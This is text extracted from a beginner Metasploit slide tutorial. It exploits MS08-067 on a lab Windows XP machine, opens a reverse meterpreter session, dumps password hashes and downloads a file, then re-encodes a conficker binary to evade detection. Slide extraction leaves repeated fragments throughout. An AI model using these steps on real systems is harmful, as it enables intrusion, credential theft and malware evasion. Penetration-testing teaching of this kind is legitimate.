Sei sulla pagina 1di 32

Metasploit 101

By: Metacortex For:

Metasploit 101 By: Metacortex For:

Audience:

- People who haven't used metasploit before or know what it is

- People looking to maybe learn some new features of metasploit

- Nubs

used metasploit before or know what it is - People looking to maybe learn some new

What is Metasploit?

Metasploit is an exploitation framework. It is an all in one toolkit for everything pentesters, researchers, and exploit developers need.

Written in Ruby

Open Source

Highly extensible and customizable

Originally written by HD Moore

Maintained by Rapid7 Developers

in Ruby Open Source Highly extensible and customizable Originally written by HD Moore Maintained by Rapid7

Getting Metasploit

Best way to get a hold of it is to grab it off SVN

Available already installed in BackTrack

Can download pre packaged versions

way to get a hold of it is to grab it off SVN Available already installed

Linux Prerequisites

To run Metasploit, you need Ruby and Rubygems.

dc@801:~/metasploit$ sudo aptitude install ruby rubygems The following NEW packages will be installed:

libruby1.8{a} ruby ruby1.8{a} ruby1.8-dev{a} rubygems

rubygems1.8{a}

0 packages upgraded, 6 newly installed, 0 to remove and 0 not upgraded. Need to get 2,622 kB of archives. After unpacking 11.0 MB will be used. Do you want to continue? [Y/n/?] y

0 not upgraded. Need to get 2,622 kB of archives. After unpacking 11.0 MB will be

SVN Download

dc@801:~/metasploit$ svn co https://www.metasploit.com/svn/framework3/trunk/

A trunk/msfelfscan

A trunk/scripts

A trunk/scripts/ps

A trunk/scripts/ps/msflag.ps1

A trunk/scripts/resource

A trunk/documentation/rpm

A trunk/documentation/rpm/metasploit.spec

U

trunk

Checked out revision 15702.

A trunk/documentation/rpm A trunk/documentation/rpm/metasploit.spec U trunk Checked out revision 15702.

SVN Update

dc@801:~/metasploit/trunk$ svn update

U

external/source/meterpreter/source/extensions/priv/server/priv.c

U

external/source/meterpreter/source/extensions/stdapi/server/stdapi.c

U

external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c

U

HACKING

D

documentation/users_guide.pdf

A

documentation/Gemfile

A

documentation/users_guide_4.2.pdf

A

documentation/users_guide_4.3.pdf

Updated to revision 15703.

A documentation/users_guide_4.2.pdf A documentation/users_guide_4.3.pdf Updated to revision 15703.

Download binaries

Do that at

http://www.metasploit.com/download/

Download binaries Do that at http://www.metasploit.com/download/
Download binaries Do that at http://www.metasploit.com/download/

What do you get?

dc@801:~/metasploit/trunk$ ls

armitage

HACKING

msfd

msfpescan plugins

tools

COPYING

lib

msfelfscan

msfrop

README.md

data

modules

msfencode

msfrpc

scripts

documentation msfbinscan msfgui

msfrpcd spec

external

msfcli

msfmachscan msfupdate test

Gemfile

msfconsole msfpayload

msfvenom

THIRD-

PARTY.md

A whole lot of stuff

msfmachscan msfupdate test Gemfile msfconsole msfpayload msfvenom THIRD- PARTY.md A whole lot of stuff

msfconsole

dc@801:~/metasploit/trunk$ ls

armitage

HACKING

msfd

msfpescan plugins

tools

COPYING

lib

msfelfscan

msfrop

README.md

data

modules

msfencode

msfrpc

scripts

documentation msfbinscan msfgui

msfrpcd spec

external

msfcli

msfmachscan msfupdate test

 

Gemfile

msfconsole msfpayload

msfvenom

THIRD-

PARTY.md

But we are really interested in msfconsole

  Gemfile msfconsole msfpayload msfvenom THIRD- PARTY.md But we are really interested in msfconsole

msfconsole

dc@801:~/metasploit/trunk$ sudo ./msfconsole [sudo] password for dc:

 

,

,

((

/

---,,,---

\ ))

 
 

(_) O O (_)

 

|\

 

\ _ / o_o \

M S F

 

|

\

 

\

|

*

 

|||

WW|||

|||

|||

=[ metasploit v4.4.0-release [core:4.4 api:1.0]

+ -- --=[ 922 exploits - 496 auxiliary - 150 post

+ -- --=[ 251 payloads - 28 encoders - 8 nops =[ svn r15704 updated today (2012.08.04)

msf >

496 auxiliary - 150 post + -- --=[ 251 payloads - 28 encoders - 8 nops

msfconsole help

msf > help

Core Commands =============

Command

Description

-------

-----------

?

Help menu

back

Move back from the current context

banner

Display an awesome metasploit banner

cd

Change the current working directory

color

Toggle color

connect

Communicate with a host

exit

Exit the console

help

Help menu

info

Displays information about one or more module

irb

Drop into irb scripting mode

jobs

Displays and manages jobs

jobs Displays and manages jobs

msfconsole search

msf > search ms08_067

Matching Modules ================

Name

Disclosure Date Rank

Description

----

--------------- ----

-----------

exploit/windows/smb/ms08_067_netapi 2008-10-28

Relative Path Stack Corruption

great Microsoft Server Service

----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 Relative Path Stack Corruption great Microsoft Server Service

Nmap

msf > nmap -A 192.168.0.107 [*] exec: nmap -A 192.168.0.107

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-04 00:51 MDT Nmap scan report for 192.168.0.107 Host is up (0.00033s latency). Not shown: 997 closed ports

PORT

135/tcp open msrpc

139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds MAC Address: 08:00:27:35:04:D6 (Cadmus Computer Systems) Device type: general purpose Running: Microsoft Windows XP OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003 Network Distance: 1 hop Service Info: OS: Windows

STATE SERVICE

VERSION

Microsoft Windows RPC

SP3, or Windows Server 2003 Network Distance: 1 hop Service Info: OS: Windows STATE SERVICE VERSION

Exploits and Payloads

Exploit: Code that leverages a certain vulnerability

Payload: Code that gets placed on the system post exploitation

Exploit: Code that leverages a certain vulnerability Payload: Code that gets placed on the system post

Selecting an Exploit

Once you have identified a vulnerability that has an exploit in metasploit, lets go ahead and use it.

In this example, we are going against a fresh instal of Windows XP SP2

XP SP2 is notorious for MS08-067 (the bug conficker used)

The MS08-067 is a super reliable exploit so we will use it

SP2 XP SP2 is notorious for MS08-067 (the bug conficker used) The MS08-067 is a super

Exploit Options

msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name

----

Current Setting Required Description --------

---------------

RHOST

yes

----------- The target address

RPORT

445

yes

Set the SMB service port

SMBPIPE BROWSER

yes

The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name -- ----

Available Payloads

msf exploit(ms08_067_netapi) > show payloads

Compatible Payloads ===================

Name

Disclosure Date Rank Description

----

generic/custom

--------------- ---- ----------- normal Custom Payload

generic/debug_trap

generic/shell_bind_tcp

normal

Generic x86 Debug Trap

Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)

windows/vncinject/reverse_tcp Injection), Reverse TCP Stager windows/vncinject/reverse_tcp_allports Injection), Reverse All-Port TCP Stager

normal

VNC Server (Reflective

normal VNC Server (Reflective

Injection), Reverse All-Port TCP Stager normal VNC Server (Reflective normal VNC Server (Reflective

Select Payload

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp

exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp

Show Exploit Options

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name

----

Current Setting Required Description --------

---------------

-----------

RHOST

yes

The target address

RPORT

445

yes

Set the SMB service port

SMBPIPE BROWSER

yes

The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name

----

Current Setting Required Description --------

---------------

yes

-----------

EXITFUNC thread LHOST

yes

Exit technique: process, none, seh, thread The listen address

LPORT

4444

yes

The listen port

Exploit target:

Id Name -- ----

0 Automatic Targeting

The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0

Set Exploit Options

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.107 RHOST => 192.168.0.107 msf exploit(ms08_067_netapi) > set LHOST 192.168.0.101 LHOST => 192.168.0.101 msf exploit(ms08_067_netapi) > show options

> set LHOST 192.168.0.101 LHOST => 192.168.0.101 msf exploit(ms08_067_netapi) > show options

Verify Options

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name

----

Current Setting Required Description --------

---------------

-----------

RHOST

192.168.0.107

yes

The target address

RPORT

445

yes

Set the SMB service port

SMBPIPE BROWSER

yes

The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name

----

Current Setting Required Description --------

---------------

EXITFUNC thread

yes

----------- Exit technique: process, none, seh, thread

LHOST

192.168.0.101

yes

The listen address

LPORT

4444

yes

The listen port

Exploit target:

Id Name -- ----

0 Automatic Targeting

The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0

EXPLOIT!

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.0.101:4444 [*] Automatically detecting the target [*] Fingerprint: Windows XP - Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (AlwaysOn NX) [*] Attempting to trigger the vulnerability [*] Sending stage (752128 bytes) to 192.168.0.107 [*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.107:1041) at Sat Aug 04 00:43:16 -0600 2012

meterpreter >

session 1 opened (192.168.0.101:4444 -> 192.168.0.107:1041) at Sat Aug 04 00:43:16 -0600 2012 meterpreter >

Basic Meterpreter

meterpreter > ifconfig Interface 1 ============

Name

Hardware MAC : 00:00:00:00:00:00

MTU

IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0

: MS TCP Loopback interface

: 1520

Interface 2 ============

Name

Hardware MAC : 08:00:27:35:04:d6

MTU

IPv4 Address : 192.168.0.107 IPv4 Netmask : 255.255.255.0

: AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport

: 1500

Interface 2

============

Name

Hardware MAC : 08:00:27:35:04:d6

MTU

IPv4 Address : 192.168.0.107 IPv4 Netmask : 255.255.255.0

: AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport

: 1500

: 192.168.0.107 IPv4 Netmask : 255.255.255.0 : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler

Basic Meterpreter

meterpreter > hashdump

Administrator:500:52b7bd1c19ac445baad3b435b51404ee:d04b083dd7cbadb1f6abbca2d64222a5:::

dc801-1:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

HelpAssistant:1000:acdfc6045fe025a3618e54ed631edee9:919ec17846e9c0392ff21e5f93eb60d4:::

SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:

2a19baf0800172a7622217c273064e3a:::

SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee: 2a19baf0800172a7622217c273064e3a:::

Basic Meterpreter

meterpreter > search -f *credit* Found 2 results c:\\Documents and Settings\dc801-1\Desktop\CreditCardData.txt (16 bytes) c:\\Documents and Settings\dc801-1\Recent\CreditCardData.lnk (519 bytes) meterpreter > cd C:\\ meterpreter > cd Documents\ and\ Settings meterpreter > cd dc801-1 meterpreter > cd Desktop meterpreter > ls Listing: C:\Documents and Settings\dc801-1\Desktop ==================================================

Mode

Size Type Last modified

Name

----

---- ---- -------------

----

40777/rwxrwxrwx

0

dir

Sun Aug 05 13:07:32 -0600 2012 .

40777/rwxrwxrwx

0

dir

Sat Aug 04 00:18:30 -0600 2012

100666/rw-rw-rw-

16

fil

Sun Aug 05 13:08:20 -0600 2012 CreditCardData.txt

meterpreter > download CreditCardData.txt [*] downloading: CreditCardData.txt -> CreditCardData.txt [*] downloaded : CreditCardData.txt -> CreditCardData.txt

downloading: CreditCardData.txt -> CreditCardData.txt [*] downloaded : CreditCardData.txt -> CreditCardData.txt

Basic Meterpreter

dc@801:~/metasploit/trunk$ ls

armitage

HACKING msfelfscan

msfrpc

spec

COPYING

lib

msfencode msfrpcd

CreditCardData.txt modules

msfgui

test msfupdate THIRD-PARTY.md

data msfbinscan msfmachscan msfvenom tools documentation msfcli msfpayload plugins external msfconsole msfpescan README.md Gemfile msfd msfrop scripts dc@801:~/metasploit/trunk$ cat CreditCardData.txt not really. lulz

dc@801:~/metasploit/trunk$

Gemfile msfd msfrop scripts dc@801:~/metasploit/trunk$ cat CreditCardData.txt not really. lulz dc@801:~/metasploit/trunk$

MSFEncode

MSFEncode

MSFEncode

dc@801:~/metasploit/trunk$ ./msfencode -i conficker.EXE -o notconficker.exe -e x86/shikata_ga_nai -c 10 [*] x86/shikata_ga_nai succeeded with size 86045 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 86074 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 86103 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 86132 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 86161 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 86190 (iteration=6)

[*] x86/shikata_ga_nai succeeded with size 86219 (iteration=7)

[*] x86/shikata_ga_nai succeeded with size 86248 (iteration=8)

[*] x86/shikata_ga_nai succeeded with size 86277 (iteration=9)

[*] x86/shikata_ga_nai succeeded with size 86306 (iteration=10)

x86/shikata_ga_nai succeeded with size 86277 (iteration=9) [*] x86/shikata_ga_nai succeeded with size 86306 (iteration=10)

MSFEncode file size jump

dc@801:~/metasploit/trunk$ ls -alh *conficker* -rw-r--r-- 1 dc dc 84K 2012-08-29 13:23 conficker.EXE -rw-r--r-- 1 dc dc 368K 2012-08-29 13:30 notconficker.exe

-rw-r--r-- 1 dc dc 84K 2012-08-29 13:23 conficker.EXE -rw-r--r-- 1 dc dc 368K 2012-08-29 13:30 notconficker.exe

MSFEncode

MSFEncode